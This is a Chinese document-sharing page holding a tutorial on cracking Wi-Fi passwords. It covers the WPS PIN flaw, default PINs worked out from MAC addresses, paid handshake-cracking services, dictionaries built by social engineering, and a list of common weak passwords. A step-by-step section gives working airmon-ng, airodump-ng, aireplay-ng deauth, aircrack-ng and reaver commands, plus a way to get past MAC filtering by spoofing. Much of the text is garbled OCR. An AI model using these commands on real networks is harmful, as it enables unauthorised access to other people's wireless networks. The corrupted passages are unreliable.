




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
路由器wps功能漏洞路由器使用者往往會因為步驟太過麻煩,以致干脆不做任何加密安全設定,因而引發許多安全上的問題。WPS用于簡化Wi-Fi無線的安全設置和網絡管理。它支持兩種模式:個人識別碼(PIN)模式和按鈕(PBC)模式。路由器在出產時默認都開啟了wps但這真的安全么!在2011年12月28日,一名名叫StefanViehbock的安全專家宣布,自己發現了無線路由器中的 WPS(Wi-FiProtectedSetup)漏洞,利用這個漏洞可以輕易地在幾小時內破解 WPS使用的PIN碼以連上無線路由器的Wifi網絡。個人識別碼(PIN)有人可能會問了什么是pin碼?WPS技術會隨機產生一個八位數字的字符串作為個人識別號碼(PIN)也就是你路由底部除了后臺地址賬號密碼之后的一組八位數的數字,通過它可以快速登錄而不需要輸入路由器名稱和密碼等。Pin碼會分成前半四碼和后半四碼。前四碼如果錯誤的話,那路由器就會直接送出錯誤訊息,而不會繼續看后四碼,意味著試到正確的前四碼,最多只需要試10000組號碼。一旦沒有錯誤訊息,就表示前四碼是正確的,而我們便可以開始嘗試后四碼。 后四碼比前四碼還要簡單,因為八碼中的最后一碼是檢查碼,由前面七個數字產生,因此實際上要試的只有三個數字, 共一千個組合。這使得原本最高應該可達一千萬組的密碼組合(七位數+檢查碼),瞬間縮減到僅剩11,000組,大幅降低破解所需的時間?1|2|3145?rvi~5~IP評諒FofchecksumPIN2"tolfofPin]根據路由MAC地址算出默認pin碼另外有種更快破解wifi的方法就是根據路由MAC地址(MAC是路由器的物理地址,是唯一的識別標志)算出默認出產時的pin碼例如以下軟件還可以通過別人共享的找到pin碼!/TENDA^列踣由PIN碼計尊-anywlany論醞占用史功碼前七位芫整Fill碼I舌輸入MAC史功碼前七位芫整Fill碼I舌輸入MAC后六:位■TP91TF-LJWKTWliHEBZTMJDB3TP-tlWKTKHftWHSm.如卿3IT-LSBETEniECiEmCii,r4KldnK?EBOntT.irlES.^器TF-L3KETETHTLIJjEEj1ftriU79IT'LIBTTETHTLMIEiTFTIBETWE粟4HEZKElSllU£phIWfi3£il4-Q-JL &B:津1闆*Cl叨対貝1&畀酣=齡曲刃応円I和啊栩血汕:岳EJ5i.4-B-,ai32監國:4E(K722CEEHH■:E.旳;gt35-3n]J003W14-M14;ECir54-a7-nT-:re■MTT4TQTQB14-0-5EDrll;?;19A=Xi &1=B6:Tfl4DjL4->tfi.bl'iX-抓取握手包破解提前條件是有客戶端連接wifi.另外作者是不會講破解wep的.使用的小伙伴好自為之.就簡單介紹下原理吧一個TCP包走進一家酒吧,對服務員說:給我來瓶啤酒”服務員說:你要來瓶啤酒?”TCP包說:是的,來瓶啤酒”服務員說:好的”1、 當一個無線客戶端與一個無線AP連接時,先發出連接認證請求(握手申請:你好?。?、 無線AP收到請求以后,將一段隨機信息發送給無線客戶端(你是?)3、無線客戶端將接收到的這段隨機信息進行加密之后再發送給無線 AP(這是我的名片)4、無線AP檢查加密的結果是否正確,如果正確則同意連接 (哦?原來是自己人呀?。┩ǔN覀冋f的抓握手包”是指在無線AP與它的一個合法客戶端在進行認證時,捕獲信息原文”和加密后的密文”利用Deauth驗證攻擊。也就是說強制讓合法無線客戶端與AP被斷開,當它被從WLAN中斷開后,這個無線客戶端會自動嘗試重新連接到AP上,在這個重新連接過程中,數據包通信就產生了,然后利用airodump捕獲一個無線路由器與無線客戶端四次握手的過程,生成一個包含四次握手的cap包。然后再利用字典進行暴力破解.另外也提下關于這行的黑色產業.當我們抓到帶數據的握手包時.這時候黑色產業往往會幫我們很大的忙.GPU速度也是我們普通設備跑密碼的速度上百倍.所以我是不建議自己跑密碼的!吧包發給那些團隊,跑的出密碼才收10-30rmb不等的費用(根據需要跑的密碼定價分普通包還有金剛包,普通包的字典只使用十個 G的字典.金剛包會使用五十G以上的字典收費也會偏貴些)不過也有一些團隊會收取電費(既跑不跑的出密碼都會收取一定的費用)...另外這樣的設備非常耗電不是一般人的消耗的起的哦.一般閑置的時候會利用這樣的機器挖礦分布式破解《駭客追緝令》片中的主人公都是有使用到分布式破解的 ?拿電影中的米特尼克來說吧.劇情中他拿到下村勉的加密后的密文,一般電腦來說要跑出密碼需要幾十年至幾百年的時間才有機會跑出密碼?此時的米特尼克利用了偽裝?欺騙了某大學保安?偷偷的潛入進去使用大學中的超級電腦,只使用了幾個小時就能到了想要的結果!《血色星期一》中的主角三浦春馬使用了傀儡網絡(肉雞)使他在半個小時拿到了密碼.(兩部電影因為太久沒看了可能有些地方說錯了見諒。 )于2009年9月26日晚ZerOne無線安全團隊與AnyWIan無線門戶成功完成國內首次分布式破解項目MOSCRACK是一個perl應用程序,通過Mosix集群軟件或是簡單的SSH連接,它可在云計算機上方便的破解 WPAkey。云節點可以運行任何unix主機(包括Cygwin),這意味著Moscrack可以部署在windows操作系統上||!:?tt!itViewS■曲me Tjb^Help5ldWxOfltno族:chudiCopyingEltirfjtcdChu-nkpid5ldWxOfltno族:chudiCopyingEltirfjtcdChu-nkpid如上chitnitt&tiwtedGwVigLXCltLlflKQid痂曲Esti阿tM直trmte0?tcbuN(CopyincjLauMhL週Cdpying'LanfichingIdUlKhlHflLiJilffillipC4py丄h蓉(fryingWyingCWyl怦CflpyinflL^un<hingi,-d'j<ieFi1rigLaunchingUUfKhin^LjjHtninqin^LaunchIngL^uiixh^l-aanthir^tw^jrl10lK?ieiqj.lta.l.pglfl1255'31.CMipvttL 疋《?euzon*?i.co*U6?M.c<mwjr<!-1.,tcm■7J-123.CW^uie 榊八訶17-ldT-it?.匚MicHitEJl.iTJe<2- -'J.2994匚oavutc■1.E2-*4T-IM-15IE*罕占MlWlb1)4 1.irl:O*k-^.CCft14'4^-l$3.{Cnvutr1+WM'tciiJhMvec7-5C-1^-G7 1.arr^imawE.tpffle<2■乃'lil-2^5*31.tQ^iutr1.au2onHK.com113.c(Mput?-l.a*uo?w?.ctMiee£16^- 1.twiaute1.aiiHEcnifti's.co*M21W-?J■l^J-W.COfllWlt1l.Ml20AMH.t<Wle<2'W L13.<011^11?'1.dA^fVMUl.CM)lh.lfcB.J理TO^triikd讓t.M3tileitonacte19i?.l&a.178iMVlttia*'tiiMi146紙gfiK/1e!.,珥“iy.iilcr肌 fl.]S4血WUa<TivfPHKE5TMwticr&ckflKt.lilcoHplrtimti_ms:J76seietidsfs2"血 cw.^uU-lT3*4!5yi^&rca*lf*riKriviphoiH:■oi-crKluiictk34&g14ocli.^Dr(Kt$b4*$cwnoUtiontuw:156second±ipjivne?&cnckdi<t.3A3fliesnodealrcr?k-oqtil?(lenodeaircra{k-f>gAircrack-叫alrcra£*-<hqfIlestew*ef"材!0KMlefile?tow<MHies<4r?oxtonoc>@&irCratk-hg^Irtrack-nq_adrcrack-(^/liest?nodtaircrwk-n^alrcrack^iK]alrcwk-n^aiTCrack-ngAlftr*ck-n4a-irtr*出■購I藥517][26517]IJ65J7]J24517]G#rwrJUKI^DdWntd1245的】|26515]!2631?1|恥$的](rerKtaie^Spwwrf12殆打II曲也]IJS523]!2^H|厲詢n*旳[血洞IjtsniHJ65H]i⑹射j皈]10凹IIJIW87112W9S]甘時虻||J6??9|I曲?】I護測112椚珂|J64B7]iawajjI[245M汕.“tK;h諸肚haw:/ki.在2.8版本中,MOSCRACK增加了插件框架,支持破解hash,包含SHA256/512,DES,MD5和*BlowfishUnixpassword 等都可以通過DehasherMoscrack插件來進行處理。Moscrack特點:api允許運行調用、各破解節點可自動或動態配置可以自寫插件支持CUDA/OpenCL(使用Pyrit插件)節點檢查和回復支持SSH,RSH,Mosix 跟節點通信支持Mosix集群軟件兼容性:理論上應該支持所有UN*X系統,作者在如下系統測試正常運行:MoscrackLiveCD(SUSE)UbuntuLinux12.10x8664bitUbuntuLinux12.04.2x8664bitUbuntuLinux10.10x8664bitUbuntuLinux10.10x8632bitCentOSLinux5.5x8632bitFreeBSD8.1x8664bitWindowsVistaBusiness64bitw/Cygwin1.7.7-1WindowsVistaBusiness64bitw/Cygwin1.7.9MacOSX10.5.6(iPCOSx86)SolarisExpress11x64iPhone3giOS3.2.1(Jailbroken)SamsungGalaxyS2SGH-I727R(Cyanogenmod10+Linuxchroot)工具附上.另外想說是分布式破解只是思路。不是破解方案。破不出來也沒有關系。Wifi萬能鑰匙orwifi分享其實我是十分不愿意提到這款流氓軟件的.但這也是大部分網友主要的破解 wifi的途徑.為什么我不愿意提這款軟件.又必須提到呢.答:這款最流氓的功能也就是這款軟件最核心的功能.就是集成了全國各地的wifi賬號密碼.這必定包括一些惡意分享和一些無意分享出來的使用這款軟件開始的時候有兩個選項一 .自動分享熱點.二.分享前提示我.默認是選擇一的.有些心急破解wifi的小伙伴可能看到沒看就直接點擊了下一步.將自己本機保存的wifi賬號無意間公之于眾.醬紫即使wifi密碼強度在強也會因為豬一樣的隊友.團滅.這樣誤操作的例子真的很多.不得不提到的就是這款軟件強大的集成了全國各地的 wifi賬號密碼.當你使用這款軟
件的時候可以很方便的根據附近的ssid.mac地址在萬能鑰匙的數據庫中找到正確的密碼.這方便了用戶也方便了不懷好意的童鞋~~小米科技也試著模仿盛大的萬能鑰匙.可最終還是死在了搖籃里。13年9月5日晚間消息,小米科技今日年度發布會上發布的MIUI新功能一一Wifi密碼自助分享引發爭議,眾多網友指責小米此行為將導致Wifi嚴重安全隱患,有咖啡店主甚至指責小米此行為如同偷竊。從2013-8-2開始到發布會截止前,一個月就分享了 32萬個公共Wi-Fi密碼,可想而知后續這個雪球會滾得更加大。微博網友 @王偉也對這個新功能十分憤怒,他表示:我們只剩下兩個選擇:1、拒絕向使用小米手機的朋友提供家里/公司的wifi密碼。2、使用小米手機的朋友離開之后馬上更改家里 公司的wifi密碼。”另外為什么萬能鑰匙沒有遭到封殺我也不得而知了 .但我想勸大家一句.逼不得已千萬不要依靠萬能鑰匙.弱密碼WPA-PSK的密碼空間用浩瀚來形容一點不為過,所以直接進行字典攻擊是傻子的行為.但是作為一個密碼對字典攻擊來說有強密碼和弱密碼的區別.強密碼就是破解希望極其渺茫的密碼.弱密碼是很有希望破解的密碼當然強弱也是個相對概念,他也是依賴于加安全制的.銀行的密碼一般都為6位.像這樣密碼空間如此小的密碼.普通情況下都為弱密碼.但是銀行的ATM一天只讓你試三次.三次密碼不對鎖卡.有這樣的機制6位的就不再是弱密碼了.由弱密碼組成的字典叫弱密碼字典.在當今很多地方以用戶名和口令作為鑒權的世界,口令的重要性就可想而知了??诹罹拖喈斢谶M入家門的鑰匙,當他人有一把可以進入你家的鑰匙,想想你的安全、你的財物、你的隱私……害怕了吧。因為弱口令很容易被他人猜到或破解,所以如果你使用弱口令,就像把家門鑰匙放在家門口的墊子下面,是非常危險的。在前幾天的時間里,我在漏洞平臺連續提交了多個電信系統的弱口令,并在多個政府網站以及計費系統中發現存在特別低級的弱口令。 現如今,不同的人對于弱口令有不同的認識,我們從以下幾個角度(非用戶角度)現一下對于弱口令的想法。
網站程序開發者:設置個簡單點的密碼讓客戶容易記,再把自己的網站弄成默認密碼還有宣傳作用。網站程序使用者:看起來這個默認密碼挺安全的,我就用這個密碼了。網站管理員A:密碼復雜了太難記,記不住怎么辦,還是簡單點吧。網站管理員B:這樣的密碼容易讓別人知道,用什么好呢,又得是一個我能記住的,對了,就用我的QQ或者新浪等等密碼吧。(此種情況往往會通過其他途徑泄漏管理員的登錄密碼)以上通過幾個身份的不同角度來描述對弱口令的看法。在烏云漏洞平臺的弱口令事件,我通過搜索“弱口令”發現:有2714條記錄(截止到2014年8月30日)弱口令的危害極大,我們不能不重視。弱口令TOP100:123456789a123456123456a1234567891234567890woaini1314qq123456abc123456123456a123456789a147258369
zxcvbnm98765432112345678910abc123qq123456789123456789.7708801314520woaini5201314520q123456123456abc1233211234567123123123123456.0123456789asd123456aa123456135792468q123456789abcd12345612345678900woaini520woaini123zxcvbnm1231111111111111111w123456aini1314abc123456789111111woaini521
qwertyuiop13145205201234567891qwe123456asd12300000014725836901357924680789456123123456789abcZ1234561234567899aaa123456abcd1234www123456123456789q123abcqwe123w1234567897894561230123456qqZXC123456123456789qq111111111111111111100000000000000001234567891234567qazwsxedcqwerty123456..
zxc123asdfghjkl00000000001234554321123456q123456aa9876543210110120119qaz123456qq52013141236987455201314000000000as1234561231235841314520Z12345678952013145201314a123123caonimaa5201314wang123456abcd123123456789..woaini1314520123456asdaa123456789741852963a12345678
弱口令能做什么?進入后臺修改資料,比如說考試成績,電費水費。財務報銷,比如說某企業的財務申請,將現金打入你的卡中。竊取企業內部資料。例如OA平臺中的文件等等。獲取用戶的信息。比如說通過后臺登陸某個用戶的賬號, 把里面的資金轉出。實時監控:監控別人的一舉一動,甚至可以看到“潛規則”。其他等等如何防范?不使用空口令或系統缺省的口令,因為這些口令眾所周之,為典型的弱口令。2?口令長度不小于8個字符。3?口令不應該為連續的某個字符(例如: AAAAAAAA)或重復某些字符的組合。4?口令應該為以下四類字符的組合,大寫字母(A-Z)、小寫字母(a-z)、數字(0-9)和特殊字符。每類字符至少包含一個。如果某類字符只包含一個,那么該字符不應為首字符或尾字符。5?口令中不應包含本人、父母、子女和配偶的姓名和出生日期、紀念日期、登錄名、E-mail地址等等與本人有關的信息,以及字典中的單詞。6?口令不應該為用數字或符號代替某些字母的單詞。7?口令應該易記且可以快速輸入,防止他人從你身后很容易看到你的輸入。8.至少90天內更換一次口令,防止未被發現的入侵者繼續使用該口令我該注意什么?在筆記本或其它地方不要記錄口令。向他人透露口令,包括管理員和維護人員。在e-mail或即時通訊工具中不透露口令。離開電腦前,鎖定電腦,設置密碼。在多個帳戶之間使用不相同的口令。在公共電腦不要選擇程序中可保存口令的功能選項。總結:弱口令的危害仍然存在,每天的安全事件中弱口令無處不在,通過弱口令進入后臺,獲取權限,財務轉賬,計費修改,實時監控,都是完全可以實現的?,F如今中國獨創的漢字密碼在有些網站已經開始應用,漢字密碼通常會比目前的密碼規則安全,也期待更多的普及和應用。FreeBuf推薦:如何設置安全的密碼根據使用場景及重要程度我們密碼使用的場景大概分為以下幾類:財產類(重要)這類直接關系到我們的金錢相關的賬戶,其中包括銀行,支付寶,購物賬戶等。這些賬戶一旦被盜,將給我們直接造成經濟損失。通訊類(重要)這類主要包括電子郵件, QQ、msn,這里主要包含我們經常聯系的人。同時郵箱中還包含很多注冊信息、以及其他密碼信息。往來郵件等。臨時類(不重要)一般是,我們在網絡上搜索東西,需要注冊才能夠使用的,這種我們一般是臨時內容。工作類(重要)一般是我們工作中需要用到的一些密碼,包括服務器密碼, ftp密碼,網站后臺密碼,無線密碼、路由密碼,其他認證密碼等。常用類(中等)這種一般的是我們常去的一些網站或論壇、社區等地方。這些不涉及財產,不涉及個人隱私等信息。隱私類(重要)對于在網絡上,有些網站是需要提交個人信息、或者相關證件等信息的。還有上傳照片的,網絡硬盤等存在有我們私人的東西的地方。 當然,對于這些也會根據我們在這些地方上傳的內容有來定。有一定聯系性規律性密碼例子:有人曾破如此一個WPA-PSK密碼IX1V7051242.如果你不了解這個密碼的背景你肯能會覺得很神奇,這么強的密碼也能破。這樣的密碼是在西班牙的tele2這樣的AP上有,而且這樣AP_ESSID里都有tele2字段。這樣的密碼后面的8位是相同的有真正的密碼只有四位。四位密碼其密碼空間很小很容易被字典攻擊出來。這個也是AP的默認密碼。所以這個密碼被破解是因為AP本身產生的隨機密碼就是個弱密碼。是AP的廠家自己降低了安全性的做法。例如有一些餐廳.酒店.事業單位.等等.SSID總會改成名字的拼音.密碼當然是跟ssid相關的.最常見的就是這個單位的電話號碼!社會工程學有目的性的社工師多多少少都掌握著WIFI使用者的個人信息~?不然怎么會叫做有目的的社工師呢?哈哈~~例一個目標說吧了?會將跟目標有關系的人生日組合.姓名縮寫(即開頭字母)?姓名拼音.手機號碼.一般目標的戀愛對象?暗戀對象.重要的人.不排除基友~?成功率最高.還有目標的?姓名.生日.手機號碼.郵箱號碼.網名(即ID.這招對黑闊很管用)?習慣用的字符,當然還有常用的密碼!!!.還有一些特殊號碼.特殊日子(結婚紀念日.開始戀愛)等等資料生成一個字典?】舉一個例子一位在安全圈混的一位小黑闊?具有很高的安全意識,知道AP要使用一個很強大的密碼比如hack!@#1024但他這個人比較懶到那都使用著這個密碼.然后這位黑闊在某個論壇某個網站注冊了賬號習慣性的輸入了引以為傲的強密碼?然后這些網站被黑(拖庫)社工師根據密碼生成了一個字典(根據泄露出來密碼進行組合)然后就不用我多說了?這樣的例子不少!《劍魚行動》中那個黑客是如何在一分鐘進入國家安全信息網的啊。就是網絡上工作著為他收集密碼的程序。而他就是通過這樣的字典迅速破解的。而這樣的字典真正的黑客也是不愿意發布出來的。0X)2實例抓取握手包破解.網卡的選擇也十分重要?一般使用筆記本內置網卡破解的話一定要看一下網卡型號kali有沒有驅動.我用的是8187卡,kali自帶驅動我就不說了。 本次的實例是根據抓握手包破解進行的
Ii?gl^kdlls-#iftoTif±^-a1g Link助lx妙:L處機Loopibackihtaddn127.001Mssk'255.0.0.0lrme-tiBaddr:::1/izbscope-HostUPLOOPBACKRUNNINGMTU:GS536*lgtrlc:1HXpditket^:22errors.0dropped:0overruns:0frane.0TXpi&rk^ts-^22errors0drappert:0a誦rrun§:0carri*n0cMltsiens:0t胃qu&ualan:0RKbytes:1284(1.2KiBJTXbytes:12S4(1.2KiB)譏mnOLinkencap:Ethernetrti/icldrDO:25:22:49:27:fc.Irwtaddn192.168.LIMBcaiUSSHaste2SS2SS.2S5.0ir>et6a-ddn^eBO::225:2?ff:fs49-27rc/64Srop?rLinkUPBR0ACEAS1RUNNINGMULTICASTntll:1SOOMetric:1RXpdck^ts:SSfifierrorsDdf&p&actDovorrtins:&fraws:0TX 1265.60errorSOrir-spp^d:Oav*rFLri4:0cir-『空豊廣:Dcollisions:Qtxqueuelen:fOooRXbyles:1492112|1.4MIS]TXbytes:8959780(8.5M1B|ij-l^rd■丄【誦eLlrmorrngstart^lanDAirmon-ngstartwlan0意思是啟動網卡的監聽模式.敲完這條命令后設備名意思是啟動網卡的監聽模式.敲完這條命令后設備名wlan=mon0般命令后都SISIFi-FRBU0?1a600on:eeos:43:BOcEAr96:89:£B:4S00:26:07:SC:C5:22EB:4E;06:12:05:4674:ESfDB;£6:07:82(nat甘鷲蟲&亡丄占!tod)(notHncKlHitad)(notassociated){nota^sacioted)14:E6:SISIFi-FRBU0?1a600on:eeos:43:BOcEAr96:89:£B:4S00:26:07:SC:C5:22EB:4E;06:12:05:4674:ESfDB;£6:07:82(nat甘鷲蟲&亡丄占!tod)(notHncKlHitad)(notassociated){nota^sacioted)14:E6:E4:C9-CE:02;21+己厚止 SlmgmAr>,門斗41IIr常ItiOPOQSS1D PWHBeaconsCIPHLRAUTHKSID*Ja^a.ENl0FURLostProbeChlnaWaiCCHPCCHPCCHPWPI.2hPA2WPA2CCHPCCHPPSKPSKPSkPSKPSKWsCH)MUCCNP1PSK^二rtsiriGS詵PCCHPD4:.l1fl1□Da154aHP葩CCMP跆K0 1 54e.0 6 £4雖0 11 S4$00Do2566uu38206926135323543122211011O7D10II■&106是要跟上設備名14:F6:=4;C9:CE02-311GFA;6B;88:B2:6A 390C:37;DC;F1:90:53-47F4:EC:J8:::D-D9:00-5374:EA:鮮:3E:DE0E-5S74:EA:3A;3D;F8;CO-56OO:IE;E5:^9:7*:45*5454:B&:FC:25:9巳砂-61匚氐64:匚了:SB:99: -61fiC:ES:731Dfi:1tt7A-&3E8:4E:06:12:DS:41 6400:36;76:OBC9E:7F-67Airodump-ngmon0在抓包前肯定是要先選擇目標?這條命令的意思是探測無線網絡?選好目標,首選是客戶端連接多的?復制好BSSID即MAC地址.記住信道(CH)0000匚匚H1|IElapse±2hours15mins][2014-D9-0401l;31](WPAhandstiake:F4:EC:3S:DDrDEESlb38:嗆09:DO69&971S?46曲.Rate1 544.|_D5-tEl忙CIPHEFt沖氐CCM^i.TH-raTesProbeEESlb38:嗆09:DO69&971S?46曲.Rate1 544.|_D5-tEl忙CIPHEFt沖氐CCM^i.TH-raTesProbeSISTECE1出GCtD*DO話:QCtD重DO38:OftD9:DO3S:0D:D9-:DO38:ODf:D9:DO18:DCM:D1:19:55IB:DC:54:DI;211:1CCB:F6:50:DC:22:06TO:Ffi:1CEE:ID:173B:I9C1A:M■■Sa-11??1iSa-111e-11300S107SM791961S907(11+已停止airDchjniF-ng■eI-"-bssidFiEC:)8:00:D6DO?wmoblrnonOAirodump-ng-c1--bssidXX:XX:XX:XX:XX-wmobimonO-C參數是選擇目標信道.如果該信道就目標一個AP使用的話不用加上--bssid這個參數是為了跟精準的鎖定目標~~-w是保存握手包的名字.獲取后會在當前目錄生成一個mobi-01.cap的握手包。這時就不用關閉這條shell而是另外打開一個shell16:2616:27■ie-27:1&:2S:16:2616:27■ie-27:1&:2S:16:29;16:29i6:ao:1&;BO!16:11!16:12:16:31;FdirepLary-ng-010yF4;EC;38CD;09;DO-c4C;AA;16;嗆ilingi仙ndl/igSendingSendlngiSendingS?ndxngiStindljrigiSendingSmdlngi!S色“已Wig5endingforb?Kon (SSSID:M:EC:3B:OHD9:D0>ar6464646464E4646464directeddLLrecteddlrectoddiirKt?ddlrKtflddirected<JJLr^cteddlr?T^d-Jlr^tednfi4i.ith.DAAuth,DeAuth.DflAuth,DvAuth.DfiAutn.DeAutti,De-Auth.D^Auth.D^AuirLSTMiC:£~HAZ:STM/lC:STHAC-5TTIAC:STMAC;E~MAZ:S-TMAC:STMAC:[4€:a?:16-23:51:27][4C:AA:1C:23:51:27]|[4C;AA:1&:23;51:27][4C:M:16;21:51:27][砒:醐:16:SI;27][4C;Ai:16.2351;IT][K;M;16;J3;51;27](4C:AA:IS:23:51:27][42: U:23:5V27][4以崩:恆23:51:27110^3916284AV&6&O65SS4-555S6引51SI引口引司對時別¥KKKKccCOG4AAAAAireplay-ng-010-a(AP的mac)-c(客戶端的mac)-0參數是發起deauth攻擊.10是次數可以調節-a即第一條shell中BSSID.下面的AP路由器MAC地址-c即STATION下客戶機的MAC地址(這條為可選項)
Airer-ack-ng1.2beta3[DO.00;DO|9 tastfid(10W.59k/i)KEYFOUMDI|sistdcIZU|KeyAC?C6AS6F42?7C31ID68IEDF25CAE62S069BKeyAC?C6AS6F42?7C31ID68IEDF25CAE62S069B04ft5IR27SB03reoc973G0E2A3CCfi23F7BE5A32017S700E2A3CCfi23F7BE5A32017S70935D490255E9CE93372F【2B4706DTransi^itKwyAircrack-ng-w/pentest/passwords/sxsx.1stmobi-01.cap-w選擇字典mobi-01.cap即抓到的握手包Ps:我是不建議自己跑密碼的.我直接掛載u盤吧握手包copy到u盤里在.通過QQ方式吧包發給跑包團隊.然后是吧正確密碼添加到了我的字典里。才會出現上圖(既成功破解后的圖)! 另外是密碼使用有一定聯系性規律性密碼破解方案二:利用路由器wps功能漏洞Airodump-ngmon0查看附近無線情況。在MB這行帶點的“表示能跑出pin碼使用wash-imon0-C可查看是否開啟了wps功能jion0b :日:和ReavervlAWIFIProtf^ct^d車AtracKToolCopy(cj2611*TacticalNetwcrkSolutinns,匚「aigHeffner<cheffner^tacnetgol.ccm>[+.waitingforbtacon\ron!£;FA;E1-L+jSwitchingmon8tochanmat&[+]Aasfldatodwith1C:R;68:肪;B2;弗(ESSID:(null]JL+Jiryinflpin12345670I+SardingE^PCLSTAP7roquostI+1RccflivfldidentityroquostI+]5er.<iinflidentityras^onsa丨十】RgtflivedHlI-i-'^erdin^N2 寸gwI+'beee^jedHJI+?SerxdingM乙rsssage|:]*AA^IhG:Receivetimeoutoccu*r^d[+]RacftSCKACKUrS■-餌rtlOt幽IdLi”Reaver-imon0-bxx:xx:xx:xx-vvreaver命令參數-i監聽后接口名稱-b目標mac地址-a自動檢測目標AP最佳配置-S使用最小的DHkey(可以提高PJ速度)-vv顯示更多的非嚴重警告-d即delay每窮舉一次的閑置時間預設為1秒-t即timeout每次窮舉等待反饋的最長時間-c指定頻道可以方便找到信號,如-c1指定1頻道,大家查看自己的目標頻道做相應修改(非TP-LINK路由推薦-9-9參數防止路由僵死示例:reaver-imonO-bMAC-a-S-d9-t9-vv|應因狀況調整參數(-c后面都已目標頻道為1作為例子)目標信號非常好:reaver-imonO-bMAC-a-S-vv-d0-c1|目標信號普通:reaver-imon0-bMAC-a-S-vv-d2-t5-c1|目標信號一般:reaver-imon0-bMAC-a-S-vv-d5-c10X)3防御只是一個步驟?安全是一個系統看我任何突MAC封鎖!氏線局域網適配器無線網絡連:極碼約卵一掩租過網CP覽蟲網常認CP連描Ad物DH自本1P碼約卵一掩租過網CP覽蟲網常認CP連描Ad物DH自本1P子香裁DH接述--用■3JFJP■■-JJ-O~r■MM毒■mo~r-m.--m后綴地址:QualcomnAtlierosAR5GUE222WirelessNetvc:20-16-D8-7?-^;f:FeU0=:al77:e275^21^2^12(首J):192-1&8-2.102<^^5=255-255.255_9=2014年9月們日14:47:33:2014-^9^13B16:47:33:192-16B-2.1:192-166-2.1客戶機的截圖模擬主人使用MAC過濾功能!在路由器上使用mac過濾.黑客就一點辦法的沒有了么?.no!ro<jt^;iili: arpin^g-iwlanObbs?isilic?org-w5arping:Canresolvebbs?isilic?org
root^lkdLi;"ttJimw(n)root^lkdLi;"ttJimw(n)CH1 ]|E"p無d;8£1|2014-fl^-1J14:趙][f:KCd■hdiiPl■DriK-1RSSIDPWRKOBeaicors ffiatauCH怦EMCCIPHERMBHESSID28:2C:32:31:74:2A亠3 22a 001S4e.CCMPP£Kmebl-tesBSSIDSTA7I0N^flP Rat電LOStFramesProbe28j2C:32:31; '2D:1&oe:79: n0*105mobi-tfiST由于路由器只接受白名單的數據包?所以kali無法從dns服務器獲取到域名IProottaali: ifconfigwlanOSIOCSIFHWADDR;設備或資源忙root@(ali:FifconfigwlanOaLi: ifconfigwlanO「皿1:@日li:~#ifconfigwlanO-younayneedtodowntheinterfacedownhwether20:16:D8:79:upwlanOLinkencap:EthernetHWaddr20:16;d8:l79:UPBROADCASTMULTICASTMTU:1500網毗廠RXpackets:522errors;0dropped:0overruns:0frame:0IXpackets:615errors:
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 裝飾公司施工管理制度模板
- 廠房圍墻施工合同范本
- 洗浴行業競爭策略分析考核試卷
- 電動車輛熱管理系統考核試卷
- 娛樂用品行業發展趨勢預測考核試卷
- 收藏品網絡平臺運營與管理考核試卷
- 樂曲類錄音制品制作服務行業跨境出海戰略研究報告
- 紙質文具行業直播電商戰略研究報告
- 酒店茶幾行業直播電商戰略研究報告
- 書法書籍行業跨境出海戰略研究報告
- 2025年沈陽地鐵集團有限公司招聘筆試參考題庫含答案解析
- 【含聽力9英一模】合肥市蜀山區2024年中考一模英語
- 2025至2031年中國蝴蝶蘭行業投資前景及策略咨詢研究報告
- 房地產投資項目不確定性因素分析
- 《中匯稅務師事務所》課件
- 2025屆東北三省三校高三第二次聯考語文試卷含解析
- 專題03辨析題解題技巧與方法(課件)道德與法治中考復習題型解題技巧與方法
- GB/T 44113-2024用戶側電化學儲能系統并網管理規范
- 1248國開電大本科《公共部門人力資源管理》自檢自測試題及答案
- 【教案】二項式定理教學設計-2024-2025學年高二下學期數學人教A版(2019)選擇性必修第三冊
- 國開2024年秋《大數據技術概論》形考作業1-4答案
評論
0/150
提交評論